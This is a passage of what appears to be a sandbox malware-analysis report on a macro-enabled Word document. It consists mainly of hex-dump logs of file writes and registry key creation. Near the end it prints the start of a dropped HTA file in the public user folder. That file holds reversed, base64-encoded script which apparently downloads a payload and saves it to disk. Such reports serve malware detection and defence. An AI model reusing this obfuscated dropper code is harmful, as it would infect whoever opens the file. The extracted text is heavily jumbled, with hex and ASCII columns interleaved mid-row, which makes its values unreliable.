4 0d 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 bc 00 00 00 .... success or wait 1 66AC3F8E unknown

Copyright Joe Security LLC 2021 Page 33 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 684 00 00 00 00 64 00 00 ....d...... ,...... X...... success or wait 1 66AC3F8E unknown 00 c8 00 00 00 2c 01 ...... L...... x... 00 00 90 01 00 00 f4 ....@...... l...... 4..... 01 00 00 58 02 00 00 ...... `...... (...... T... bc 02 00 00 20 03 00 ...... H...... t...... 00 84 03 00 00 e8 03 <...... h...... 0... 00 00 4c 04 00 00 b0 ...... \...... $...... P. 04 00 00 14 05 00 00 ...... |...... D...... 78 05 00 00 dc 05 00 p...... 8...... 00 40 06 00 00 a4 06 00 00 08 07 00 00 6c 07 00 00 d0 07 00 00 34 08 00 00 98 08 00 00 fc 08 00 00 60 09 00 00 c4 09 00 00 28 0a 00 00 8c 0a 00 00 f0 0a 00 00 54 0b 00 00 b8 0b 00 00 1c 0c 00 00 80 0c 00 00 e4 0c 00 00 48 0d 00 00 ac 0d 00 00 10 0e 00 00 74 0e 00 00 d8 0e 00 00 3c 0f 00 00 a0 0f 00 00 04 10 00 00 68 10 00 00 cc 10 00 00 30 11 00 00 94 11 00 00 f8 11 00 00 5c 12 00 00 c0 12 00 00 24 13 00 00 88 13 00 00 ec 13 00 00 50 14 00 00 b4 14 00 00 18 15 00 00 7c 15 00 00 e0 15 00 00 44 16 00 00 a8 16 00 00 0c 17 00 00 70 17 00 00 d4 17 00 00 38 18 00 00 9c 18 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 6c 00 00 cc .....l...B...... success or wait 1 66AC3F8E unknown 42 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 0a 00 00 d0 ...... success or wait 1 66AC3F8E unknown 08 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 24 00 00 00 1c ....$...... success or wait 1 66AC3F8E unknown 00 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 0c 00 00 00 ...... success or wait 1 66AC3F8E unknown 07 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 80 00 00 00 ff ...... success or wait 1 66AC3F8E unknown ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 20 00 00 80 ...... success or wait 1 66AC3F8E unknown 10 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 02 00 00 ff ...... success or wait 1 66AC3F8E unknown ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 78 00 00 ec .....x...I...... success or wait 1 66AC3F8E unknown 49 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 0b 00 00 54 ...... T...... success or wait 1 66AC3F8E unknown 06 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 10 00 00 10 ...... success or wait 1 66AC3F8E unknown 0e 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 00 00 00 ff ...... success or wait 1 66AC3F8E unknown ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 20 00 00 00 10 ...... success or wait 1 66AC3F8E unknown 00 00 00 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 00 00 00 ff ...... success or wait 1 66AC3F8E unknown ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 00 00 00 ff ...... success or wait 1 66AC3F8E unknown ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 ff ff ff ff 00 00 00 00 ff ...... success or wait 1 66AC3F8E unknown ff ff ff 0f 00 00 00

Copyright Joe Security LLC 2021 Page 34 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 17100 26 21 00 00 ff ff ff ff 00 &!...... success or wait 1 66AC3F8E unknown 00 00 00 ff ff ff ff 0f 00 ...... 00 00 00 00 00 00 00 ...... 00 00 00 00 00 00 00 ...... &!...... 00 00 00 00 00 00 00 ...... 0..... 00 00 00 00 00 18 00 ..,...... 00 00 00 00 00 00 14 ...... /...... 00 00 00 00 00 00 00 ...... ff ff ff ff 00 00 00 00 00 ....H...... D.. 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 03 00 03 80 00 00 00 00 20 2e c3 0f ff ff ff ff 26 21 01 00 ff ff ff ff 00 00 00 00 ff ff ff ff 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 03 00 03 80 00 00 00 00 e0 2f c3 0f ff ff ff ff a6 10 02 00 ff ff ff ff 00 00 00 00 ff ff ff ff 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 44 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 128 38 10 00 00 f8 07 00 8...... P...... @...... success or wait 1 66AC3F8E unknown 00 50 10 00 00 10 08 ..X...... 00 00 a8 0f 00 00 40 (...... X...... h. 0e 00 00 c0 0f 00 00 ...... H...... p...x...... 0... b8 0e 00 00 58 0e 00 00 18 0f 00 00 e8 0b 00 00 98 0a 00 00 e8 0e 00 00 c0 0c 00 00 c8 0d 00 00 28 0e 00 00 90 09 00 00 88 0b 00 00 20 10 00 00 58 0b 00 00 08 10 00 00 88 0e 00 00 68 10 00 00 d8 0f 00 00 88 05 00 00 48 0f 00 00 90 0c 00 00 10 0e 00 00 70 0e 00 00 78 0f 00 00 00 0f 00 00 30 0f 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4224 68 ae 4e 15 60 18 e5 h.N.`..C...8.y...... CPf.. success or wait 1 66AC3F8E unknown 43 bb 92 bd 38 1f 79 ...... 0...... CPf...... c3 80 fe ff ff ff ff ff ff ff .0..d...... CPf...... 0.... 01 43 50 66 0f be 1a ...... t...... 0..,...... 10 8b bb 00 aa 00 30 ....t...... 0...... G.... 0c ab 00 00 00 00 ff ff ...... k.i...... W...... ff ff 13 43 50 66 0f be .k.iX...... r.u...... k.i.. 1a 10 8b bb 00 aa 00 ...... p#...... t ...... 30 0c ab 64 00 00 00 q#...... ff ff ff ff 0b 43 50 66 0f be 1a 10 8b bb 00 aa 00 30 0c ab c8 00 00 00 ff ff ff ff 02 e0 f6 be 74 a8 1a 10 8b ba 00 aa 00 30 0c ab 2c 01 00 00 ff ff ff ff 03 e0 f6 be 74 a8 1a 10 8b ba 00 aa 00 30 0c ab 90 01 00 00 ff ff ff ff 20 47 bb 10 97 f7 ce 11 b9 ec 00 aa 00 6b 1a 69 f4 01 00 00 ff ff ff ff e0 03 0c 57 97 f7 ce 11 b9 ec 00 aa 00 6b 1a 69 58 02 00 00 ff ff ff ff 90 f5 72 ec 75 f3 ce 11 b9 e8 00 aa 00 6b 1a 69 bc 02 00 00 ff ff ff ff 70 23 b0 82 bc b5 cf 11 81 0f 00 a0 c9 03 00 74 20 03 00 00 ff ff ff ff 71 23 b0 82 bc b5 cf 11 81 0f 00 a0 c9 03 00

Copyright Joe Security LLC 2021 Page 35 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 1792 20 03 00 00 01 00 00 ...... success or wait 1 66AC3F8E unknown 00 ff ff ff ff ff ff ff ff 84 ...... L...... 03 00 00 01 00 00 00 ...... ff ff ff ff ff ff ff ff e8 03 ...... p...h...... 00 00 01 00 00 00 ff ff ...... 0..... ff ff ff ff ff ff 4c 04 00 ...... 00 01 00 00 00 ff ff ff ff ...... d...... (# ff ff ff ff b0 04 00 00 01 ...... 00 00 00 ff ff ff ff ff ff ff .#...... ff bc 02 00 00 01 00 00 00 ff ff ff ff ff ff ff ff d8 0e 00 00 01 00 00 00 ff ff ff ff 70 00 00 00 68 10 00 00 03 00 00 00 ff ff ff ff ff ff ff ff 04 10 00 00 01 00 00 00 ff ff ff ff 90 00 00 00 30 11 00 00 03 00 00 00 ff ff ff ff ff ff ff ff a0 0f 00 00 01 00 00 00 ff ff ff ff b0 00 00 00 94 11 00 00 03 00 00 00 ff ff ff ff ff ff ff ff 64 19 00 00 01 00 00 00 ff ff ff ff d0 00 00 00 28 23 00 00 03 00 00 00 ff ff ff ff ff ff ff ff c8 19 00 00 01 00 00 00 ff ff ff ff f0 00 00 00 f0 23 00 00 03 00 00 00 ff ff ff ff ff ff ff C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2256 00 00 01 03 00 00 00 ...... 8...... P...... success or wait 1 66AC3F8E unknown 00 38 10 00 00 01 00 ...... 01 03 00 00 00 00 50 ...... 10 00 00 02 00 00 01 ...... 00 00 00 00 00 00 00 ...... 00 03 00 00 01 00 00 ...... 00 00 00 00 00 00 04 ...... 00 00 01 00 00 00 00 ...... 00 00 00 00 05 00 00 ...... 01 00 00 00 00 01 00 00 00 06 00 00 01 00 00 00 00 02 00 00 00 07 00 00 01 00 00 00 00 00 00 00 00 08 00 00 01 00 00 00 00 00 00 00 00 09 00 00 01 00 00 00 00 00 00 00 00 0a 00 00 01 00 00 00 00 01 00 00 00 0b 00 00 01 00 00 00 00 02 00 00 00 0c 00 00 01 00 00 00 00 00 00 00 00 0d 00 00 01 00 00 00 00 00 00 00 00 0e 00 00 01 00 00 00 00 00 00 00 00 0f 00 00 01 00 00 00 00 01 00 00 00 10 00 00 01 00 00 00 00 02 00 00 00 11 00 00 01 00 00 00 00 00 00 00 00 12 00 00 01 00 00 00 00 00 00 00 00 13 00 00 01 00 00 00 00 00 00 00 00 14 00 00 01 00 00 00 00 01 00 00 00 15 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 28 20 10 00 00 00 00 00 ...... -.stdole2.tlbWWW success or wait 1 66AC3F8E unknown 00 02 00 00 00 2d 00 73 74 64 6f 6c 65 32 2e 74 6c 62 57 57 57

Copyright Joe Security LLC 2021 Page 36 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 512 74 41 00 00 bc 24 00 tA...$..\0...I...G..`<...-..XE success or wait 1 66AC3F8E unknown 00 5c 30 00 00 a8 49 ..,A...G...0...I..<,...H..pF.. 00 00 e4 47 00 00 60 h=.. 3c 00 00 f8 2d 00 00 B..d$...;..DG..HF..HC..H> 58 45 00 00 2c 41 00 ...&..L<...:.. D..D8...E...G.. 00 bc 47 00 00 88 30 .E...C...I...I..,[email protected] 00 00 cc 49 00 00 3c ...>...?..4B...E...G...C...2.. 2c 00 00 cc 48 00 00 .A...H..\D...E...(.../...-...1 70 46 00 00 68 3d 00 [email protected]...!...@..@;...*.. 00 20 42 00 00 64 24 lE...@..$F...>. 00 00 b8 3b 00 00 44 47 00 00 48 46 00 00 48 43 00 00 48 3e 00 00 94 26 00 00 4c 3c 00 00 18 3a 00 00 20 44 00 00 44 38 00 00 a8 45 00 00 18 47 00 00 80 45 00 00 10 43 00 00 14 49 00 00 84 49 00 00 2c 30 00 00 24 40 00 00 90 42 00 00 ac 44 00 00 1c 3e 00 00 ac 3f 00 00 34 42 00 00 14 45 00 00 98 47 00 00 a4 43 00 00 94 32 00 00 14 41 00 00 0c 48 00 00 5c 44 00 00 bc 45 00 00 84 28 00 00 c0 2f 00 00 ac 2d 00 00 e4 31 00 00 b4 41 00 00 b4 40 00 00 6c 34 00 00 e8 21 00 00 9c 40 00 00 40 3b 00 00 08 2a 00 00 6c 45 00 00 cc 40 00 00 24 46 00 00 fc 3e 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 18924 ff ff ff ff ff ff ff ff 07 00 ...... C.MSFormsW...... success or wait 1 66AC3F8E unknown 43 0f 4d 53 46 6f 72 8 6d 73 57 00 00 00 00 ..OLE_COLORWWWd...... ff ff ff ff 09 38 e4 f5 4f .8(oOLE_ 4c 45 5f 43 4f 4c 4f 52 HANDLEWW...... 8.WOL 57 57 57 64 00 00 00 E_OPTEXC ff ff ff ff 0a 38 28 6f 4f LUSIVE,...... 8..IFontWW 4c 45 5f 48 41 4e 44 W...... 4c 45 57 57 c8 00 00 (U.Font...... 8.*fmDrop 00 ff ff ff ff 10 38 c2 57 EffectX...... 8.bfmAction.... 4f 4c 45 5f 4f 50 54 45 .....8.kIDataAutoWrapper 58 43 4c 55 53 49 56 ..... 45 2c 01 00 00 ff ff ff ff ...8.VIReturnIntegerWW..... 05 38 9f ce 49 46 6f ....8.9IReturnBool 6e 74 57 57 57 90 01 00 00 ff ff ff ff 04 28 55 10 46 6f 6e 74 f4 01 00 00 ff ff ff ff 0c 38 a9 2a 66 6d 44 72 6f 70 45 66 66 65 63 74 58 02 00 00 ff ff ff ff 08 38 8c 62 66 6d 41 63 74 69 6f 6e bc 02 00 00 ff ff ff ff 10 38 8f 6b 49 44 61 74 61 41 75 74 6f 57 72 61 70 70 65 72 20 03 00 00 ff ff ff ff 0e 38 dc 56 49 52 65 74 75 72 6e 49 6e 74 65 67 65 72 57 57 84 03 00 00 ff ff ff ff 0e 38 e0 39 49 52 65 74 75 72 6e 42 6f 6f 6c

Copyright Joe Security LLC 2021 Page 37 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 1620 22 00 4d 69 63 72 6f ".Microsoft Forms 2.0 success or wait 1 66AC3F8E unknown 73 6f 66 74 20 46 6f Object L 72 6d 73 20 32 2e 30 ibrary..C:\Windows\SysW 20 4f 62 6a 65 63 74 OW64\fm 20 4c 69 62 72 61 72 20.hlpWW..NoneWW..Cop 79 1c 00 43 3a 5c 57 yWW..Move 69 6e 64 6f 77 73 5c WW..CopyOrMove..CutW 53 79 73 57 4f 57 36 WW..PasteW 34 5c 66 6d 32 30 2e ..DragDropWW..InheritWW 68 6c 70 57 57 04 00 W..OnWW 4e 6f 6e 65 57 57 04 WW..OffWWW..DefaultW 00 43 6f 70 79 57 57 WW..ArrowW 04 00 4d 6f 76 65 57 ..CrossW..IBeamW..SizeN 57 0a 00 43 6f 70 79 ESWWW.. 4f 72 4d 6f 76 65 03 SizeNS..SizeNWSEWW..S 00 43 75 74 57 57 57 izeWE..Up 05 00 50 61 73 74 65 ArrowWWW..HourG 57 08 00 44 72 61 67 44 72 6f 70 57 57 07 00 49 6e 68 65 72 69 74 57 57 57 02 00 4f 6e 57 57 57 57 03 00 4f 66 66 57 57 57 07 00 44 65 66 61 75 6c 74 57 57 57 05 00 41 72 72 6f 77 57 05 00 43 72 6f 73 73 57 05 00 49 42 65 61 6d 57 08 00 53 69 7a 65 4e 45 53 57 57 57 06 00 53 69 7a 65 4e 53 08 00 53 69 7a 65 4e 57 53 45 57 57 06 00 53 69 7a 65 57 45 07 00 55 70 41 72 72 6f 77 57 57 57 09 00 48 6f 75 72 47 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 3600 1a 00 08 40 08 00 08 ...@...... @...... @...... @.. success or wait 1 66AC3F8E unknown 80 1a 00 06 40 06 00 ...... d...... ,...... 06 80 1a 00 0b 40 0b 0...... 8...... H..... 00 0b 80 1a 00 02 40 .@...... X...... @...... %... 02 00 02 80 1d 00 ff 7f ....p...... @...... @.. 64 00 00 00 1a 00 ff 7f ...... 1...... =...... 20 00 00 00 1d 00 ff 7f ...... @...... I...... 2c 01 00 00 1a 00 ff 7f ...... U...... a... 30 00 00 00 1a 00 ff 7f ...... m.. 38 00 00 00 1d 00 ff 7f 19 00 00 00 1a 00 ff 7f 48 00 00 00 1a 00 00 40 18 00 00 80 1a 00 fe 7f 58 00 00 00 1a 00 13 40 17 00 13 80 1d 00 ff 7f 25 00 00 00 1a 00 ff 7f 70 00 00 00 1a 00 10 40 10 00 10 80 1a 00 fe 7f 80 00 00 00 1a 00 03 40 03 00 03 80 1d 00 ff 7f 31 00 00 00 1a 00 ff 7f 98 00 00 00 1d 00 ff 7f 3d 00 00 00 1a 00 ff 7f a8 00 00 00 1a 00 0c 40 0c 00 0c 80 1d 00 ff 7f 49 00 00 00 1a 00 ff 7f c0 00 00 00 1d 00 03 00 f4 01 00 00 1d 00 ff 7f 55 00 00 00 1a 00 ff 7f d8 00 00 00 1d 00 ff 7f 61 00 00 00 1a 00 ff 7f e8 00 00 00 1d 00 ff 7f 6d 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 03 00 fe ff ff ff 57 57 ...... WW...... WW success or wait 1 66AC3F8E unknown 03 00 ff ff ff ff 57 57 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 24 03 00 00 $... success or wait 107 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 24 00 $. success or wait 1956 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 22 00 00 19 00 19 80 00 ...... L..D...... success or wait 1757 66AC3F8E unknown 00 00 00 0c 00 4c 00 11 44 01 00 01 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 12 00 00 00 00 24 11 00 ....$...... success or wait 1215 66AC3F8E unknown 00 0a 00 00 00

Copyright Joe Security LLC 2021 Page 38 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 88 00 00 00 00 00 00 00 ...... success or wait 107 66AC3F8E unknown 00 02 00 00 00 02 00 ...... 00 00 03 00 00 00 03 ...... `...`...`...`...`...` 00 00 00 04 00 00 00 04 00 00 00 05 00 00 00 05 00 00 00 06 00 00 00 06 00 00 00 07 00 00 00 07 00 00 00 08 00 00 00 08 00 00 00 10 00 01 60 11 00 01 60 12 00 01 60 13 00 01 60 14 00 01 60 15 00 01 60 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 88 14 11 00 00 14 11 00 ...... 8...8...\...\...... success or wait 107 66AC3F8E unknown 00 38 11 00 00 38 11 ...... 8... 00 00 5c 11 00 00 5c 8...`...... 8... 11 00 00 80 11 00 00 80 11 00 00 a8 11 00 00 a8 11 00 00 d8 11 00 00 d8 11 00 00 10 12 00 00 10 12 00 00 38 12 00 00 38 12 00 00 60 12 00 00 88 12 00 00 b0 12 00 00 dc 12 00 00 20 13 00 00 38 13 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 88 00 00 00 00 24 00 00 ....$...H...l...... success or wait 107 66AC3F8E unknown 00 48 00 00 00 6c 00 ...D...h...... 00 00 90 00 00 00 b4 [email protected]...... 00 00 00 d8 00 00 00 fc 00 00 00 20 01 00 00 44 01 00 00 68 01 00 00 8c 01 00 00 b0 01 00 00 d4 01 00 00 f8 01 00 00 1c 02 00 00 40 02 00 00 64 02 00 00 88 02 00 00 ac 02 00 00 dc 02 00 00 00 03 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 4d 53 46 54 MSFT success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 02 00 01 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 09 04 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 51 00 Q. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 00 00 .. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 02 00 .. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 2 00 00 .. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 06 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 ab 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 cd 02 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 15 24 00 00 .$.. success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 00 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 24 00 00 00 $... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 ff ff ff ff .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 20 00 00 00 ... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 80 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 0d 00 00 00 .... success or wait 1 66AC3F8E unknown C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 4 bc 00 00 00 .... success or wait 1 66AC3F8E unknown

Copyright Joe Security LLC 2021 Page 39 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 684 00 00 00 00 64 00 00 ....d...... ,...... X...... success or wait 1 66AC3F8E unknown 00 c8 00 00 00 2c 01 ...... L...... x... 00 00 90 01 00 00 f4 ....@...... l...... 4..... 01 00 00 58 02 00 00 ...... `...... (...... T... bc 02 00 00 20 03 00 ...... H...... t...... 00 84 03 00 00 e8 03 <...... h...... 0... 00 00 4c 04 00 00 b0 ...... \...... $...... P. 04 00 00 14 05 00 00 ...... |...... D...... 78 05 00 00 dc 05 00 p...... 8...... 00 40 06 00 00 a4 06 00 00 08 07 00 00 6c 07 00 00 d0 07 00 00 34 08 00 00 98 08 00 00 fc 08 00 00 60 09 00 00 c4 09 00 00 28 0a 00 00 8c 0a 00 00 f0 0a 00 00 54 0b 00 00 b8 0b 00 00 1c 0c 00 00 80 0c 00 00 e4 0c 00 00 48 0d 00 00 ac 0d 00 00 10 0e 00 00 74 0e 00 00 d8 0e 00 00 3c 0f 00 00 a0 0f 00 00 04 10 00 00 68 10 00 00 cc 10 00 00 30 11 00 00 94 11 00 00 f8 11 00 00 5c 12 00 00 c0 12 00 00 24 13 00 00 88 13 00 00 ec 13 00 00 50 14 00 00 b4 14 00 00 18 15 00 00 7c 15 00 00 e0 15 00 00 44 16 00 00 a8 16 00 00 0c 17 00 00 70 17 00 00 d4 17 00 00 38 18 00 00 9c 18 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 f0 03 00 00 cc 42 00 .....B...... success or wait 1 66AC3F8E unknown 00 ff ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 bc 5e 00 00 d0 08 00 .^...... success or wait 1 66AC3F8E unknown 00 ff ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 8c 67 00 00 1c 00 00 .g...... success or wait 1 66AC3F8E unknown 00 ff ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 bc 57 00 00 00 07 00 .W...... success or wait 1 66AC3F8E unknown 00 ff ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 bc 46 00 00 80 00 00 .F...... success or wait 1 66AC3F8E unknown 00 ff ff ff ff 0f 00 00 00 C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 16 3c 47 00 00 80 10 00

Copyright Joe Security LLC 2021 Page 40 of 49 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd unknown 17100 26 21 00 00 08 c8 00 &!...... success or wait 1 66AC3F8E unknown 00 00 00 00 00 00 00 ...... 00 00 03 00 00 00 00 ...... 00 00 00 00 00 00 00 ...... &!...... 00 00 00 00 00 00 00 ...... 0..... 00 00 00 00 00 00 00 ..,...... 00 00 18 00 00 00 00 ...... 00 00 00 14 00 00 00 ...... 00 00 00 00 ff ff ff ff 00 ....H...... D.. 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 03 00 03 80 00 00 00 00 00 00 00 00 ff ff ff ff 26 21 01 00 08 c8 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 04 00 00 00 03 00 03 80 00 00 00 00 00 00 00 00 ff ff ff ff a6 10 02 00 08 c8 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 44 00 00 C:\Users\Public\valuePasteList.hta unknown 512 3c 68 74 6d 6c 3e 3c

69 76 20 69 64 3d 27 fTtlc29sYy50bmVtdWdyQ 63 6f 6e 74 65 6e 74 WVzYWJhdG 27 3e 66 54 74 6c 63 FEdHhlbjspMiAsImdwai50 32 39 73 59 79 35 30 c2lMZXRz 62 6d 56 74 64 57 64 YVBldWxhdlxcY2lsYnVwX 79 51 57 56 7a 59 57 FxzcmVzdV 4a 68 64 47 46 45 64 xcOmMiKGVsaWZvdGV2 48 68 6c 62 6a 73 70 YXMudG5lbXVn 4d 69 41 73 49 6d 64 ckFlc2FiYXRhRHR4ZW47 77 61 69 35 30 63 32 KXlkb2Jlc2 6c 4d 5a 58 52 7a 59 5vcHNlci5iVnlyZXVRcmFl 56 42 6c 64 57 78 68 bGMoZXRp 64 6c 78 63 59 32 6c cncudG5lbXVnckFlc2FiYX 73 59 6e 56 77 58 46 RhRHR4ZW 78 7a 63 6d 56 7a 64 47MSA9IGVweXQud 56 78 63 4f 6d 4d 69 4b 47 56 73 61 57 5a 76 64 47 56 32 59 58 4d 75 64 47 35 6c 62 58 56 6e 63 6b 46 6c 63 32 46 69 59 58 52 68 52 48 52 34 5a 57 34 37 4b 58 6c 6b 62 32 4a 6c 63 32 35 76 63 48 4e 6c 63 69 35 69 56 6e 6c 79 5a 58 56 52 63 6d 46 6c 62 47 4d 6f 5a 58 52 70 63 6e 63 75 64 47 35 6c 62 58 56 6e 63 6b 46 6c 63 32 46 69 59 58 52 68 52 48 52 34 5a 57 34 37 4d 53 41 39 49 47 56 77 65 58 51 75 64

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Users\user\Desktop\25aabd25_by_Libranalysis.docm 3499 191 success or wait 2 66AB5805 unknown

Registry Activities

Key Created

Copyright Joe Security LLC 2021 Page 41 of 49 Source Key Path Completion Count Address Symbol HKEY_CURRENT_USER\Software\Microsoft\VBA success or wait 1 66AC8A84 RegCreateKeyExA HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1 success or wait 1 66AC8A84 RegCreateKeyExA HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common success or wait 1 66AC8A84 RegCreateKeyExA HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import success or wait 1 66AB5805 unknown HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery success or wait 1 66AB5805 unknown HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\1FF7A success or wait 1 66AB5805 unknown HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations success or wait 1 66AB5805 unknown HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0 success or wait 1 66AB5805 unknown HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Toolbars success or wait 1 66B24E8B unknown HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\Toolbars\Settings success or wait 1 66B24E8B unknown

Key Value Created

